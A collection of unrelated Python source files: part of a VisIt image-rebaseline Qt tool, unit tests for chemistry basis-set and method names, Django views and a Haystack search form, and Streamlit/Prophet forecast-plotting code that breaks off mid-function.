shutil.move(self._current, baseline) # do the rebaseline!
self._next_set_of_images()
self._update_images()
def _ignore(self):
self.status("".join(["ignoring ", self._baseline, "..."]))
self._bugs.append(self._baseline)
self._next_set_of_images()
self._update_images()
def _unknown(self):
self.status("".join(["unknown ", self._baseline, "..."]))
self._next_set_of_images()
self._update_images()
def status(self, msg):
self._mainwin.statusBar().showMessage(msg)
self._mainwin.statusBar().update()
QtCore.QCoreApplication.processEvents() # we're single threaded
def _next_set_of_images(self):
"""Figures out the next set of images to display. Downloads 'current' and
'diff' results from davinci. Sets filenames corresponding to baseline,
current and diff images."""
if self._baseline is None: # first call, build list.
self._imagelist = []
print("Building initial file list... please wait.")
self.status("Building initial file list... please wait.")
for root, dirs, files in os.walk("baseline"):
for f in files:
fn, ext = os.path.splitext(f)
if ext == ".png":
# In some cases, we can trivially reject a file. Don't bother
# adding it to our list in that case.
serial_baseline_fn = os.path.join(root, f)
# Does this path contain "parallel" or "scalable_parallel"? Then
# we've got a mode specific baseline. We'll handle those based on
# the serial filenames, so ignore them for now.
if serial_baseline_fn.find("parallel") != -1: continue
baseline_fn, current_fn = baseline_current(serial_baseline_fn)
assert os.path.exists(baseline_fn)
if not trivial_pass(baseline_fn, current_fn):
self._imagelist.append(baseline_fn)
try:
while len(self._imagelist) > 0:
self._baseline = self._imagelist.pop()
# now derive other filenames based on that one.
filename = None
# os.path.split fails if there's no /
try:
filename = os.path.split(self._baseline)
filename = filename[1]
except AttributeError as e:
self.status("No slash!")
break
current_url = uri + "/c_" + filename
if (sys.version_info > (3, 0)):
f,info = urllib.request.urlretrieve(current_url, "local_current.png")
else:
f,info = urllib.urlretrieve(current_url, "local_current.png")
self.status("".join(["Checking ", current_url, "..."]))
if info.getheader("Content-Type").startswith("text/html"):
# then it's a 404 or other error; skip this image.
continue
else:
# We found the next image.
self._current = "local_current.png"
diff_url = uri + "/d_" + filename
if (sys.version_info > (3, 0)):
f,info = urllib.request.urlretrieve(diff_url, "local_diff.png")
else:
f,info = urllib.urlretrieve(diff_url, "local_diff.png")
if info.getheader("Content-Type").startswith("text/html"):
raise Exception("Could not download diff image.")
self._diff = "local_diff.png"
self.status("Waiting for input on " + filename)
break
except KeyError as e:
print(e)
print("No more images!")
self.emit(QtCore.SIGNAL('closeApp()'))
def _init_signals(self):
self.connect(self, QtCore.SIGNAL('rebaseline()'), self._rebaseline)
self.connect(self, QtCore.SIGNAL('ignore()'), self._ignore)
self.connect(self, QtCore.SIGNAL('unknown()'), self._unknown)
def keyPressEvent(self, event):
if event.key() == QtCore.Qt.Key_Q:
self.emit(QtCore.SIGNAL('closeApp()'))
if event.key() == QtCore.Qt.Key_Y:
self.emit(QtCore.SIGNAL('rebaseline()'))
if event.key() == QtCore.Qt.Key_N:
self.emit(QtCore.SIGNAL('ignore()'))
if event.key() == QtCore.Qt.Key_U:
self.emit(QtCore.SIGNAL('unknown()'))
QtCore.QCoreApplication.processEvents()
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(RebaselinePTests)
results = unittest.TextTestRunner(verbosity=2).run(suite)
if not results.wasSuccessful():
print("Tests failed, bailing.")
sys.exit(1)
app = QtGui.QApplication(sys.argv)
mw = MW()
mw.show()
mw.setWindowTitle("visit rebaseline -p")
layout = Layout(mw)
layout.show()
sys.exit(app.exec_())
|
30257
|
from pyssian.chemistryutils import is_basis,is_method
import unittest
class ChemistryUtilsTest(unittest.TestCase):
def setUp(self):
self.Valid_Basis = '6-311+g(d,p) 6-31g* cc-pVTZ D95V* LanL2DZ SDD28 Def2SVP UGBS2P2++'.split()
self.Fake_Basis = '6-311g+(d,p) 6-31*g ccpVTZ D96V* LanL2TZ SDD Def2SP UGBS2++P2'.split()
self.Valid_Methods = 'ub3lyp mp2 casscf ccsd(t) rm062x WB97XD pbepbe'.split()
self.Fake_Methods = 'bu3lyp pm2 bw97xd m06-2x pbepbe0'.split()
self.Usual_Keywords = 'opt freq scrf scf #p calcfc empiricaldispersion'.split()
def test_valid_isbasis(self):
msg = 'Valid basis not properly recognized'
for valid in self.Valid_Basis:
self.assertTrue(is_basis(valid),msg)
def test_fake_isbasis(self):
msg = 'Fake basis recognized as valid'
for fake in self.Fake_Basis:
self.assertFalse(is_basis(fake),msg)
def test_valid_ismethod(self):
msg = 'Valid method not properly recognized'
for valid in self.Valid_Methods:
self.assertTrue(is_method(valid),msg)
def test_fake_ismethod(self):
msg = 'Fake method recognized as valid'
for fake in self.Fake_Methods:
self.assertFalse(is_method(fake),msg)
def test_usual_keywords(self):
msg1 = 'Keyword recognized as basis'
msg2 = 'Keyword recognized as method'
for keyword in self.Usual_Keywords:
self.assertFalse(is_basis(keyword),msg1)
self.assertFalse(is_method(keyword),msg2)
|
30267
|
import logging
from django.apps import apps
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import Http404, HttpResponse, JsonResponse
from django.views.generic import TemplateView, View
from zentral.core.stores import frontend_store
logger = logging.getLogger("server.base.views")
class HealthCheckView(View):
def get(self, request, *args, **kwargs):
return HttpResponse('OK')
class IndexView(LoginRequiredMixin, TemplateView):
template_name = "base/index.html"
def get_context_data(self, **kwargs):
context = super(IndexView, self).get_context_data(**kwargs)
app_list = []
for app_name, app_config in apps.app_configs.items():
if getattr(app_config, "events_module", None) is not None:
app_list.append(app_name)
app_list.sort()
context["apps"] = app_list
return context
class AppHistogramDataView(LoginRequiredMixin, View):
INTERVAL_DATE_FORMAT = {
"hour": "%H:%M",
"day": "%d/%m",
"week": "%d/%m",
"month": "%m/%y",
}
def get(self, request, *args, **kwargs):
app = kwargs['app']
try:
zentral_app = apps.app_configs[app]
search_dict = getattr(zentral_app.events_module, "ALL_EVENTS_SEARCH_DICT")
except (KeyError, AttributeError):
raise Http404
interval = kwargs["interval"]
try:
date_format = self.INTERVAL_DATE_FORMAT[interval]
except KeyError:
raise Http404
labels = []
event_count_data = []
unique_msn_data = []
for dt, event_count, unique_msn in frontend_store.get_app_hist_data(interval, int(kwargs["bucket_number"]),
**search_dict):
labels.append(dt.strftime(date_format))
event_count_data.append(event_count)
unique_msn_data.append(unique_msn)
datasets = {"event_count": {
"label": "{} events".format(app),
"backgroundColor": "rgba(122, 182, 160, 0.7)",
"data": event_count_data
},
"unique_msn": {
"label": "{} machines".format(app),
"backgroundColor": "rgba(225, 100, 86, 0.7)",
"data": unique_msn_data
}}
return JsonResponse({"app": app,
"labels": labels,
"datasets": datasets})
|
30280
|
from haystack.forms import FacetedSearchForm
from haystack.query import SQ
from django import forms
from hs_core.discovery_parser import ParseSQ, MatchingBracketsNotFoundError, \
FieldNotRecognizedError, InequalityNotAllowedError, MalformedDateError
FACETS_TO_SHOW = ['creator', 'contributor', 'owner', 'content_type', 'subject', 'availability']
class DiscoveryForm(FacetedSearchForm):
SORT_ORDER_VALUES = ('title', 'author', 'created', 'modified')
SORT_ORDER_CHOICES = (('title', 'Title'),
('author', 'First Author'),
('created', 'Date Created'),
('modified', 'Last Modified'))
SORT_DIRECTION_VALUES = ('', '-')
SORT_DIRECTION_CHOICES = (('', 'Ascending'),
('-', 'Descending'))
NElat = forms.CharField(widget=forms.HiddenInput(), required=False)
NElng = forms.CharField(widget=forms.HiddenInput(), required=False)
SWlat = forms.CharField(widget=forms.HiddenInput(), required=False)
SWlng = forms.CharField(widget=forms.HiddenInput(), required=False)
start_date = forms.DateField(label='From Date', required=False)
end_date = forms.DateField(label='To Date', required=False)
coverage_type = forms.CharField(widget=forms.HiddenInput(), required=False)
sort_order = forms.CharField(label='Sort By:',
widget=forms.Select(choices=SORT_ORDER_CHOICES),
required=False)
sort_direction = forms.CharField(label='Sort Direction:',
widget=forms.Select(choices=SORT_DIRECTION_CHOICES),
required=False)
def search(self):
self.parse_error = None # error return from parser
sqs = self.searchqueryset.all().filter(replaced=False)
if self.cleaned_data.get('q'):
# The prior code corrected for an failed match of complete words, as documented
# in issue #2308. This version instead uses an advanced query syntax in which
# "word" indicates an exact match and the bare word indicates a stemmed match.
cdata = self.cleaned_data.get('q')
try:
parser = ParseSQ()
parsed = parser.parse(cdata)
sqs = sqs.filter(parsed)
except ValueError as e:
sqs = self.searchqueryset.none()
self.parse_error = "Value error: {}. No matches. Please try again".format(e.value)
return sqs
except MatchingBracketsNotFoundError as e:
sqs = self.searchqueryset.none()
self.parse_error = "{} No matches. Please try again.".format(e.value)
return sqs
except MalformedDateError as e:
sqs = self.searchqueryset.none()
self.parse_error = "{} No matches. Please try again.".format(e.value)
return sqs
except FieldNotRecognizedError as e:
sqs = self.searchqueryset.none()
self.parse_error = \
("{} Field delimiters include title, contributor, subject, etc. " +
"Please try again.")\
.format(e.value)
return sqs
except InequalityNotAllowedError as e:
sqs = self.searchqueryset.none()
self.parse_error = "{} No matches. Please try again.".format(e.value)
return sqs
geo_sq = None
if self.cleaned_data['NElng'] and self.cleaned_data['SWlng']:
if float(self.cleaned_data['NElng']) > float(self.cleaned_data['SWlng']):
geo_sq = SQ(east__lte=float(self.cleaned_data['NElng']))
geo_sq.add(SQ(east__gte=float(self.cleaned_data['SWlng'])), SQ.AND)
else:
geo_sq = SQ(east__gte=float(self.cleaned_data['SWlng']))
geo_sq.add(SQ(east__lte=float(180)), SQ.OR)
geo_sq.add(SQ(east__lte=float(self.cleaned_data['NElng'])), SQ.AND)
geo_sq.add(SQ(east__gte=float(-180)), SQ.AND)
if self.cleaned_data['NElat'] and self.cleaned_data['SWlat']:
# latitude might be specified without longitude
if geo_sq is None:
geo_sq = SQ(north__lte=float(self.cleaned_data['NElat']))
else:
geo_sq.add(SQ(north__lte=float(self.cleaned_data['NElat'])), SQ.AND)
geo_sq.add(SQ(north__gte=float(self.cleaned_data['SWlat'])), SQ.AND)
if geo_sq is not None:
sqs = sqs.filter(geo_sq)
# Check to see if a start_date was chosen.
start_date = self.cleaned_data['start_date']
end_date = self.cleaned_data['end_date']
# allow overlapping ranges
# cs < s < ce OR s < cs => s < ce
# AND
# cs < e < ce OR e > ce => cs < e
if start_date and end_date:
sqs = sqs.filter(SQ(end_date__gte=start_date) &
SQ(start_date__lte=end_date))
elif start_date:
sqs = sqs.filter(SQ(end_date__gte=start_date))
elif end_date:
sqs = sqs.filter(SQ(start_date__lte=end_date))
if self.cleaned_data['coverage_type']:
sqs = sqs.filter(coverage_types__in=[self.cleaned_data['coverage_type']])
creator_sq = None
contributor_sq = None
owner_sq = None
subject_sq = None
content_type_sq = None
availability_sq = None
# We need to process each facet to ensure that the field name and the
# value are quoted correctly and separately:
for facet in self.selected_facets:
if ":" not in facet:
continue
field, value = facet.split(":", 1)
value = sqs.query.clean(value)
if value:
if "creator" in field:
if creator_sq is None:
creator_sq = SQ(creator__exact=value)
else:
creator_sq.add(SQ(creator__exact=value), SQ.OR)
if "contributor" in field:
if contributor_sq is None:
contributor_sq = SQ(contributor__exact=value)
else:
contributor_sq.add(SQ(contributor__exact=value), SQ.OR)
elif "owner" in field:
if owner_sq is None:
owner_sq = SQ(owner__exact=value)
else:
owner_sq.add(SQ(owner__exact=value), SQ.OR)
elif "subject" in field:
if subject_sq is None:
subject_sq = SQ(subject__exact=value)
else:
subject_sq.add(SQ(subject__exact=value), SQ.OR)
elif "content_type" in field:
if content_type_sq is None:
content_type_sq = SQ(content_type__exact=value)
else:
content_type_sq.add(SQ(content_type__exact=value), SQ.OR)
elif "availability" in field:
if availability_sq is None:
availability_sq = SQ(availability__exact=value)
else:
availability_sq.add(SQ(availability__exact=value), SQ.OR)
else:
continue
if creator_sq is not None:
sqs = sqs.filter(creator_sq)
if contributor_sq is not None:
sqs = sqs.filter(contributor_sq)
if owner_sq is not None:
sqs = sqs.filter(owner_sq)
if subject_sq is not None:
sqs = sqs.filter(subject_sq)
if content_type_sq is not None:
sqs = sqs.filter(content_type_sq)
if availability_sq is not None:
sqs = sqs.filter(availability_sq)
return sqs
|
30281
|
from typing import Any, Dict, List
import datetime
import pandas as pd
import plotly.express as px
import plotly.figure_factory as ff
import plotly.graph_objects as go
import streamlit as st
from fbprophet import Prophet
from fbprophet.plot import plot_plotly
from plotly.subplots import make_subplots
from streamlit_prophet.lib.evaluation.metrics import get_perf_metrics
from streamlit_prophet.lib.evaluation.preparation import get_evaluation_df
from streamlit_prophet.lib.exposition.expanders import (
display_expander,
display_expanders_performance,
)
from streamlit_prophet.lib.exposition.preparation import get_forecast_components, prepare_waterfall
from streamlit_prophet.lib.inputs.dates import input_waterfall_dates
from streamlit_prophet.lib.utils.misc import reverse_list
def plot_overview(
make_future_forecast: bool,
use_cv: bool,
models: Dict[Any, Any],
forecasts: Dict[Any, Any],
target_col: str,
cleaning: Dict[Any, Any],
readme: Dict[Any, Any],
report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""Plots a graph with predictions and actual values, with explanations.
Parameters
----------
make_future_forecast : bool
Whether or not a forecast is made on future dates.
use_cv : bool
Whether or not cross-validation is used.
models : Dict
Dictionary containing a model fitted on evaluation data and another model fitted on the whole dataset.
forecasts : Dict
Dictionary containing evaluation forecasts and future forecasts if a future forecast is made.
target_col : str
Name of target column.
cleaning : Dict
Cleaning specifications.
readme : Dict
Dictionary containing explanations about the graph.
report: List[Dict[str, Any]]
List of all report components.
"""
display_expander(readme, "overview", "More info on this plot")
bool_param = False if cleaning["log_transform"] else True
if make_future_forecast:
model = models["future"]
forecast = forecasts["future"]
elif use_cv:
model = models["eval"]
forecast = forecasts["cv_with_hist"]
else:
model = models["eval"]
forecast = forecasts["eval"]
fig = plot_plotly(
model,
forecast,
ylabel=target_col,
changepoints=bool_param,
trend=bool_param,
uncertainty=bool_param,
)
st.plotly_chart(fig)
report.append({"object": fig, "name": "overview", "type": "plot"})
return report
def plot_performance(
use_cv: bool,
target_col: str,
datasets: Dict[Any, Any],
forecasts: Dict[Any, Any],
dates: Dict[Any, Any],
eval: Dict[Any, Any],
resampling: Dict[Any, Any],
config: Dict[Any, Any],
readme: Dict[Any, Any],
report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""Plots several graphs showing model performance, with explanations.
Parameters
----------
use_cv : bool
Whether or not cross-validation is used.
target_col : str
Name of target column.
datasets : Dict
Dictionary containing evaluation dataset.
forecasts : Dict
Dictionary containing evaluation forecasts.
dates : Dict
Dictionary containing evaluation dates.
eval : Dict
Evaluation specifications (metrics, evaluation set, granularity).
resampling : Dict
Resampling specifications (granularity, dataset frequency).
config : Dict
Cleaning specifications.
readme : Dict
Dictionary containing explanations about the graphs.
report: List[Dict[str, Any]]
List of all report components.
"""
style = config["style"]
evaluation_df = get_evaluation_df(datasets, forecasts, dates, eval, use_cv)
metrics_df, metrics_dict = get_perf_metrics(
evaluation_df, eval, dates, resampling, use_cv, config
)
st.write("## Performance metrics")
display_expanders_performance(use_cv, dates, resampling, style, readme)
display_expander(readme, "helper_metrics", "How to evaluate my model?", True)
st.write("### Global performance")
report = display_global_metrics(evaluation_df, eval, dates, resampling, use_cv, config, report)
st.write("### Deep dive")
report = plot_detailed_metrics(metrics_df, metrics_dict, eval, use_cv, style, report)
st.write("## Error analysis")
display_expander(readme, "helper_errors", "How to troubleshoot forecasting errors?", True)
fig1 = plot_forecasts_vs_truth(evaluation_df, target_col, use_cv, style)
fig2 = plot_truth_vs_actual_scatter(evaluation_df, use_cv, style)
fig3 = plot_residuals_distrib(evaluation_df, use_cv, style)
st.plotly_chart(fig1)
st.plotly_chart(fig2)
st.plotly_chart(fig3)
report.append({"object": fig1, "name": "eval_forecast_vs_truth_line", "type": "plot"})
report.append({"object": fig2, "name": "eval_forecast_vs_truth_scatter", "type": "plot"})
report.append({"object": fig3, "name": "eval_residuals_distribution", "type": "plot"})
report.append({"object": evaluation_df, "name": "eval_data", "type": "dataset"})
report.append(
{"object": metrics_df.reset_index(), "name": "eval_detailed_performance", "type": "dataset"}
)
return report
def plot_components(
use_cv: bool,
make_future_forecast: bool,
target_col: str,
models: Dict[Any, Any],
forecasts: Dict[Any, Any],
cleaning: Dict[Any, Any],
resampling: Dict[Any, Any],
config: Dict[Any, Any],
readme: Dict[Any, Any],
df: pd.DataFrame,
report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""Plots a graph showing the different components of prediction, with explanations.
Parameters
----------
use_cv : bool
Whether or not cross-validation is used.
make_future_forecast : bool
Whether or not a future forecast is made.
target_col : str
Name of target column.
models : Dict
Dictionary containing a model fitted on evaluation data.
forecasts : Dict
Dictionary containing evaluation forecasts.
cleaning : Dict
Cleaning specifications.
resampling : Dict
Resampling specifications (granularity, dataset frequency).
config : Dict
Cleaning specifications.
readme : Dict
Dictionary containing explanations about the graph.
df: pd.DataFrame
Dataframe containing the ground truth.
report: List[Dict[str, Any]]
List of all report components.
"""
style = config["style"]
st.write("## Global impact")
display_expander(readme, "components", "More info on this plot")
if make_future_forecast:
forecast_df = forecasts["future"].copy()
model = models["future"]
elif use_cv:
forecast_df = forecasts["cv_with_hist"].copy()
forecast_df = forecast_df.loc[forecast_df["ds"] < forecasts["cv"].ds.min()]
model = models["eval"]
else:
forecast_df = forecasts["eval"].copy()
model = models["eval"]
fig1 = make_separate_components_plot(
model, forecast_df, target_col, cleaning, resampling, style
)
st.plotly_chart(fig1)
st.write("## Local impact")
display_expander(readme, "waterfall", "More info on this plot", True)
start_date, end_date = input_waterfall_dates(forecast_df, resampling)
fig2 = make_waterfall_components_plot(
model, forecast_df, start_date, end_date, target_col, cleaning, resampling, style, df
)
st.plotly_chart(fig2)
report.append({"object": fig1, "name": "global_components", "type": "plot"})
report.append({"object": fig2, "name": "local_components", "type": "plot"})
report.append({"object": df, "name": "model_input_data", "type": "dataset"})
return report
def plot_future(
models: Dict[Any, Any],
forecasts: Dict[Any, Any],
dates: Dict[Any, Any],
target_col: str,
cleaning: Dict[Any, Any],
readme: Dict[Any, Any],
report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""Plots a graph with predictions for future dates, with explanations.
Parameters
----------
models : Dict
Dictionary containing a model fitted on the whole dataset.
forecasts : Dict
Dictionary containing future forecast.
dates : Dict
Dictionary containing future forecast dates.
target_col : str
Name of target column.
cleaning : Dict
Cleaning specifications.
readme : Dict
Dictionary containing explanations about the graph.
report: List[Dict[str, Any]]
List of all report components.
"""
display_expander(readme, "future", "More info on this plot")
bool_param = False if cleaning["log_transform"] else True
fig = plot_plotly(
models["future"],
forecasts["future"],
ylabel=target_col,
changepoints=bool_param,
trend=bool_param,
uncertainty=bool_param,
)
fig.update_layout(xaxis_range=[dates["forecast_start_date"], dates["forecast_end_date"]])
st.plotly_chart(fig)
report.append({"object": fig, "name": "future_forecast", "type": "plot"})
report.append({"object": forecasts["future"], "name": "future_forecast", "type": "dataset"})
return report
def plot_forecasts_vs_truth(
eval_df: pd.DataFrame, target_col: str, use_cv: bool, style: Dict[Any, Any]
) -> go.Figure:
"""Creates a plotly line plot showing forecasts and actual values on evaluation period.
Parameters
----------
eval_df : pd.DataFrame
Evaluation dataframe.
target_col : str
Name of target column.
use_cv : bool
Whether or not cross-validation is used.
style : Dict
Style specifications for the graph (colors).
Returns
-------
go.Figure
Plotly line plot showing forecasts and actual values on evaluation period.
"""
if use_cv:
colors = reverse_list(style["colors"], eval_df["Fold"].nunique())
fig = px.line(
eval_df,
x="ds",
y="forecast",
color="Fold",
color_discrete_sequence=colors,
)
fig.add_trace(
go.Scatter(
x=eval_df["ds"],
y=eval_df["truth"],
name="Truth",
mode="lines",
line={"color": style["color_axis"], "dash": "dot", "width": 1.5},
)
)
else:
fig = px.line(
eval_df,
x="ds",
y=["truth", "forecast"],
color_discrete_sequence=style["colors"][1:],
hover_data={"variable": True, "value": ":.4f", "ds": False},
)
fig.update_xaxes(
rangeslider_visible=True,
rangeselector=dict(
buttons=list(
[
dict(count=7, label="1w", step="day", stepmode="backward"),
dict(count=1, label="1m", step="month", stepmode="backward"),
dict(count=3, label="3m", step="month", stepmode="backward"),
dict(count=6, label="6m", step="month", stepmode="backward"),
dict(count=1, label="YTD", step="year", stepmode="todate"),
dict(count=1, label="1y", step="year", stepmode="backward"),
dict(step="all"),
]
)
),
)
fig.update_layout(
yaxis_title=target_col,
legend_title_text="",
height=500,
width=800,
title_text="Forecast vs Truth",
title_x=0.5,
title_y=1,
hovermode="x unified",
)
return fig
def plot_truth_vs_actual_scatter(
eval_df: pd.DataFrame, use_cv: bool, style: Dict[Any, Any]
) -> go.Figure:
"""Creates a plotly scatter plot showing forecasts and actual values on evaluation period.
Parameters
----------
eval_df : pd.DataFrame
Evaluation dataframe.
use_cv : bool
Whether or not cross-validation is used.
style : Dict
Style specifications for the graph (colors).
Returns
-------
go.Figure
Plotly scatter plot showing forecasts and actual values on evaluation period.
"""
eval_df["date"] = eval_df["ds"].map(lambda x: x.strftime("%A %b %d %Y"))
if use_cv:
colors = reverse_list(style["colors"], eval_df["Fold"].nunique())
fig = px.scatter(
eval_df,
x="truth",
y="forecast",
color="Fold",
opacity=0.5,
color_discrete_sequence=colors,
hover_data={"date": True, "truth": ":.4f", "forecast": ":.4f"},
)
else:
fig = px.scatter(
eval_df,
x="truth",
y="forecast",
opacity=0.5,
color_discrete_sequence=style["colors"][2:],
hover_data={"date": True, "truth": ":.4f", "forecast": ":.4f"},
)
fig.add_trace(
go.Scatter(
x=eval_df["truth"],
y=eval_df["truth"],
name="optimal",
mode="lines",
line=dict(color=style["color_axis"], width=1.5),
)
)
fig.update_layout(
xaxis_title="Truth", yaxis_title="Forecast", legend_title_text="", height=450, width=800
)
return fig
def plot_residuals_distrib(eval_df: pd.DataFrame, use_cv: bool, style: Dict[Any, Any]) -> go.Figure:
"""Creates a plotly distribution plot showing distribution of residuals on evaluation period.
Parameters
----------
eval_df : pd.DataFrame
Evaluation dataframe.
use_cv : bool
Whether or not cross-validation is used.
style : Dict
Style specifications for the graph (colors).
Returns
-------
go.Figure
Plotly distribution plot showing distribution of residuals on evaluation period.
"""
eval_df["residuals"] = eval_df["forecast"] - eval_df["truth"]
if len(eval_df) >= 10:
x_min, x_max = eval_df["residuals"].quantile(0.005), eval_df["residuals"].quantile(0.995)
else:
x_min, x_max = eval_df["residuals"].min(), eval_df["residuals"].max()
if use_cv:
labels = sorted(eval_df["Fold"].unique(), reverse=True)
residuals = [eval_df.loc[eval_df["Fold"] == fold, "residuals"] for fold in labels]
residuals = [x[x.between(x_min, x_max)] for x in residuals]
else:
labels = [""]
residuals_series = pd.Series(eval_df["residuals"])
residuals = [residuals_series[residuals_series.between(x_min, x_max)]]
colors = (
reverse_list(style["colors"], eval_df["Fold"].nunique()) if use_cv else [style["colors"][2]]
)
fig = ff.create_distplot(residuals, labels, show_hist=False, colors=colors)
fig.update_layout(
title_text="Distribution of errors",
title_x=0.5,
title_y=0.85,
xaxis_title="Error (Forecast - Truth)",
showlegend=True if use_cv else False,
xaxis_zeroline=True,
xaxis_zerolinecolor=style["color_axis"],
xaxis_zerolinewidth=1,
yaxis_zeroline=True,
yaxis_zerolinecolor=style["color_axis"],
yaxis_zerolinewidth=1,
yaxis_rangemode="tozero",
height=500,
width=800,
)
return fig
def plot_detailed_metrics(
metrics_df: pd.DataFrame,
perf: Dict[Any, Any],
eval: Dict[Any, Any],
use_cv: bool,
style: Dict[Any, Any],
report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""Displays a dataframe or plots graphs showing model performance on selected metrics.
Parameters
----------
metrics_df : pd.DataFrame
Dataframe containing model performance on different metrics at the desired granularity.
perf : Dict
Dictionary containing model performance on different metrics at the desired granularity.
eval : Dict
Evaluation specifications (evaluation set, selected metrics, granularity).
use_cv : bool
Whether or not cross-validation is used.
style : Dict
Style specifications for the graph (colors).
report: List[Dict[str, Any]]
List of all report components.
"""
metrics = [metric for metric in perf.keys() if perf[metric][eval["granularity"]].nunique() > 1]
if len(metrics) > 0:
fig = make_subplots(
rows=len(metrics) // 2 + len(metrics) % 2, cols=2, subplot_titles=metrics
)
for i, metric in enumerate(metrics):
colors = (
style["colors"]
if use_cv
else [style["colors"][i % len(style["colors"])]]
* perf[metric][eval["granularity"]].nunique()
)
fig_metric = go.Bar(
x=perf[metric][eval["granularity"]], y=perf[metric][metric], marker_color=colors
)
fig.append_trace(fig_metric, row=i // 2 + 1, col=i % 2 + 1)
fig.update_layout(
height=300 * (len(metrics) // 2 + len(metrics) % 2),
width=1000,
showlegend=False,
)
st.plotly_chart(fig)
report.append({"object": fig, "name": "eval_detailed_performance", "type": "plot"})
else:
st.dataframe(metrics_df)
return report
def make_separate_components_plot(
model: Prophet,
forecast_df: pd.DataFrame,
target_col: str,
cleaning: Dict[Any, Any],
resampling: Dict[Any, Any],
style: Dict[Any, Any],
) -> go.Figure:
"""Creates plotly area charts with the components of the prediction, each one on its own subplot.
Parameters
----------
model : Prophet
Fitted model.
forecast_df : pd.DataFrame
Predictions of Prophet model.
target_col : str
Name of target column.
cleaning : Dict
Cleaning specifications.
resampling : Dict
Resampling specifications (granularity, dataset frequency).
style : Dict
Style specifications for the graph (colors).
Returns
-------
go.Figure
Plotly area charts with the components of the prediction, each one on its own subplot.
"""
components = get_forecast_components(model, forecast_df)
features = components.columns
n_features = len(components.columns)
fig = make_subplots(rows=n_features, cols=1, subplot_titles=features)
for i, col in enumerate(features):
if col == "daily":
hours = forecast_df["ds"].groupby(forecast_df.ds.dt.hour).last()
values = forecast_df.loc[forecast_df.ds.isin(hours), ("ds", col)]
values = values.iloc[values.ds.dt.hour.values.argsort()] # sort by hour order
y = values[col]
x = values.ds.map(lambda h: h.strftime("%H:%M"))
elif col == "weekly":
days = forecast_df["ds"].groupby(forecast_df.ds.dt.dayofweek).last()
values = forecast_df.loc[forecast_df.ds.isin(days), ("ds", col)]
values = values.iloc[
values.ds.dt.dayofweek.values.argsort()
] # sort by day of week order
y = values[col]
x = values.ds.dt.day_name()
elif col == "monthly":
days = forecast_df["ds"].groupby(forecast_df.ds.dt.day).last()
values = forecast_df.loc[forecast_df.ds.isin(days), ("ds", col)]
values = values.iloc[values.ds.dt.day.values.argsort()] # sort by day of month order
y = values[col]
x = values.ds.dt.day
elif col == "yearly":
year = forecast_df["ds"].max().year - 1
days = pd.date_range(start=f"{year}-01-01", end=f"{year}-12-31")
y = forecast_df.loc[forecast_df["ds"].isin(days), col]
x = days.dayofyear
else:
x = components.index
y = components[col]
fig.append_trace(
go.Scatter(
x=x,
y=y,
fill="tozeroy",
name=col,
mode="lines",
line=dict(color=style["colors"][i % len(style["colors"])]),
),
row=i + 1,
col=1,
)
y_label = f"log {target_col}" if cleaning["log_transform"] else target_col
fig.update_yaxes(title_text=f"{y_label} / {resampling['freq']}", row=i + 1, col=1)
fig.update_xaxes(showgrid=False)
if col == "yearly":
fig["layout"][f"xaxis{i + 1}"].update(
tickmode="array",
tickvals=[1, 61, 122, 183, 244, 305],
ticktext=["Jan", "Mar", "May", "Jul", "Sep", "Nov"],
)
fig.update_layout(height=200 * n_features if n_features > 1 else 300, width=800)
return fig
def make_waterfall_components_plot(
model: Prophet,
forecast_df: pd.DataFrame,
start_date: datetime.date,
end_date: datetime.date,
target_col: str,
cleaning: Dict[Any, Any],
resampling: Dict[Any, Any],
style: Dict[Any, Any],
df: pd.DataFrame,
) -> go.Figure:
"""Creates a waterfall chart with the components of the prediction.
Parameters
----------
model : Prophet
Fitted model.
forecast_df : pd.DataFrame
Predictions of Prophet model.
start_date : datetime.date
Start date for components computation.
end_date : datetime.date
End date for components computation.
target_col : str
Name of target column.
cleaning : Dict
Cleaning specifications.
resampling : Dict
Resampling specifications (granularity, dataset frequency).
style : Dict
Style specifications for the graph (colors).
df: pd.DataFrame
Dataframe containing the ground truth.
Returns
-------
go.Figure
Waterfall chart with the components of prediction.
"""
N_digits = style["waterfall_digits"]
components = get_forecast_components(model, forecast_df, True).reset_index()
waterfall = prepare_waterfall(components, start_date, end_date)
truth = df.loc[
(df["ds"] >= pd.to_datetime(start_date)) & (df["ds"] < pd.to_datetime(end_date)), "y"
].mean(axis=0)
fig = go.Figure(
go.Waterfall(
orientation="v",
measure=["relative"] * (len(waterfall) - 1) + ["total"],
x=[x.capitalize() for x in list(waterfall.index)[:-1] + ["Forecast (Truth)"]],
y=list(waterfall.values),
textposition="auto",
text=[
"+" + str(round(x, N_digits)) if x > 0 else "" + str(round(x, N_digits))
for x in list(waterfall.values)[:-1]
]
+ [f"{round(waterfall.values[-1], N_digits)} ({round(truth, N_digits)})"],
decreasing={"marker": {"color": style["colors"][1]}},
increasing={"marker": {"color": style["colors"][0]}},
totals={"marker": {"color": style["colors"][2]}},
)
)
y_label = f"log {target_col}" if cleaning["log_transform"] else target_col
fig.update_yaxes(title_text=f"{y_label} / {resampling['freq']}")
fig.update_layout(
title=f"Forecast decomposition "
f"(from {start_date.strftime('%Y-%m-%d')} to {end_date.strftime('%Y-%m-%d')})",
title_x=0.2,
width=800,
)
return fig
def display_global_metrics(
evaluation_df: pd.DataFrame,
eval: Dict[Any, Any],
dates: Dict[Any, Any],
resampling: Dict[Any, Any],
use_cv: bool,
config: Dict[Any, Any],
report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""Displays all global metrics.
Parameters
----------
evaluation_df : pd.DataFrame
Evaluation dataframe.
eval : Dict
Evaluation specifications.
dates : Dict
Dictionary containing all dates information.
resampling : Dict
Resampling specifications.
use_cv : bool
Whether or note cross-validation is used.
config : Dict
Lib configuration dictionary.
report: List[Dict[str, Any]]
List of all report components.
"""
eval_all = {
"granularity": "cutoff" if use_cv else "Global",
"metrics": ["RMSE", "MAPE", "MAE", "MSE", "SMAPE"],
"get_perf_on_agg_forecast": eval["get_perf_on_agg_forecast"],
}
metrics_df, _ = get_perf_metrics(evaluation_df, eval_all, dates, resampling, use_cv, config)
if use_cv:
st.dataframe(metrics_df)
else:
